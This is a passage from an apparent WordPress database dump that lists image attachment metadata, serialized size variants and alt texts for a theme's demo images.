:4:{s:4:\"file\";s:27:\"h4-rev-img-1b-1-600x346.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"h4-rev-img-1b-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"h4-rev-img-1b-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"h4-rev-img-1b-1-600x346.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"h4-rev-img-1b-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51920,2914,'_wp_attached_file','2018/09/h2-rev-3.png'),(51921,2914,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:529;s:6:\"height\";i:63;s:4:\"file\";s:20:\"2018/09/h2-rev-3.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"h2-rev-3-300x36.png\";s:5:\"width\";i:300;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"h2-rev-3-150x63.png\";s:5:\"width\";i:150;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"h2-rev-3-300x63.png\";s:5:\"width\";i:300;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"h2-rev-3-100x63.png\";s:5:\"width\";i:100;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"h2-rev-3-300x63.png\";s:5:\"width\";i:300;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"h2-rev-3-100x63.png\";s:5:\"width\";i:100;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51922,2914,'_wp_attachment_image_alt','d'),(51923,2779,'_wp_attached_file','2018/09/landing-img-18.jpg'),(51924,2779,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:26:\"2018/09/landing-img-18.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"landing-img-18-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"landing-img-18-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"landing-img-18-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"landing-img-18-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"landing-img-18-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"landing-img-18-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-18-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"landing-img-18-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"landing-img-18-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-18-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51925,2761,'_wp_attachment_image_alt','m'),(51926,2222,'_wp_attachment_image_alt','k'),(51927,2222,'portfolio_single_masonry_image_size',''),(51928,2222,'image_gallery_masonry_image_size','large-width-height'),(51929,2564,'_wp_attachment_image_alt','d'),(51930,2564,'_wp_attachment_image_alt','d'),(51931,2721,'_wp_attachment_image_alt','d'),(51932,2779,'_wp_attachment_image_alt','m'),(51933,2764,'_wp_attached_file','2018/09/landing-img-6.jpg'),(51934,2764,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:25:\"2018/09/landing-img-6.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"landing-img-6-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"landing-img-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"landing-img-6-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"landing-img-6-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:25:\"landing-img-6-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"landing-img-6-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"landing-img-6-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"landing-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"landing-img-6-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"landing-img-6-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"landing-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51935,2224,'_wp_attached_file','2018/08/kitchen-img-gallery-2.jpg'),(51936,2224,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1300;s:4:\"file\";s:33:\"2018/08/kitchen-img-gallery-2.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"kitchen-img-gallery-2-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-2-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-2-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:34:\"kitchen-img-gallery-2-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:34:\"kitchen-img-gallery-2-650x1300.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:35:\"kitchen-img-gallery-2-1300x1300.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"kitchen-img-gallery-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51937,2567,'_wp_attached_file','2018/09/probaaaa-land.jpg'),(51938,2915,'_wp_attached_file','2018/09/h5-rev-img-5.png'),(51939,2567,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:620;s:4:\"file\";s:25:\"2018/09/probaaaa-land.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"probaaaa-land-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"probaaaa-land-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"probaaaa-land-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"probaaaa-land-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"probaaaa-land-650x620.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:620;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:25:\"probaaaa-land-650x620.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:620;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"probaaaa-land-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"probaaaa-land-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"probaaaa-land-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"probaaaa-land-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"probaaaa-land-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"probaaaa-land-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51940,2915,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:289;s:6:\"height\";i:195;s:4:\"file\";s:24:\"2018/09/h5-rev-img-5.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"h5-rev-img-5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"h5-rev-img-5-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"h5-rev-img-5-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51941,2915,'_wp_attachment_image_alt','d'),(51942,2722,'_wp_attached_file','2018/08/h4-img-3-1.jpg'),(51943,2780,'_wp_attached_file','2018/09/landing-vector-img-12.png'),(51944,2722,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:679;s:4:\"file\";s:22:\"2018/08/h4-img-3-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"h4-img-3-1-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"h4-img-3-1-1024x579.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:579;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"h4-img-3-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"h4-img-3-1-768x435.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:435;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:22:\"h4-img-3-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"h4-img-3-1-1200x650.jpg\";s:5:\"width\";i:1200;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:22:\"h4-img-3-1-650x679.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:679;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"h4-img-3-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"h4-img-3-1-600x340.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"h4-img-3-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"h4-img-3-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"h4-img-3-1-600x340.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"h4-img-3-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51945,2780,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:295;s:6:\"height\";i:203;s:4:\"file\";s:33:\"2018/09/landing-vector-img-12.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-12-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-12-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-12-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51946,2764,'_wp_attachment_image_alt','m'),(51947,2780,'_wp_attachment_image_alt','v'),(51948,2923,'_wp_attached_file','2018/09/h2-rev-img-3.jpg'),(51949,2923,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1202;s:6:\"height\";i:721;s:4:\"file\";s:24:\"2018/09/h2-rev-img-3.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-3-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"h2-rev-img-3-1024x614.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-3-768x461.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:461;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-3-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:25:\"h2-rev-img-3-1202x650.jpg\";s:5:\"width\";i:1202;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-3-650x721.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:721;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"h2-rev-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-3-600x360.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-3-600x360.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51950,2765,'_wp_attached_file','2018/09/landing-img-7.jpg'),(51951,2765,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:25:\"2018/09/landing-img-7.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"landing-img-7-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"landing-img-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"landing-img-7-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"landing-img-7-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:25:\"landing-img-7-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"landing-img-7-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"landing-img-7-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"landing-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"landing-img-7-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"landing-i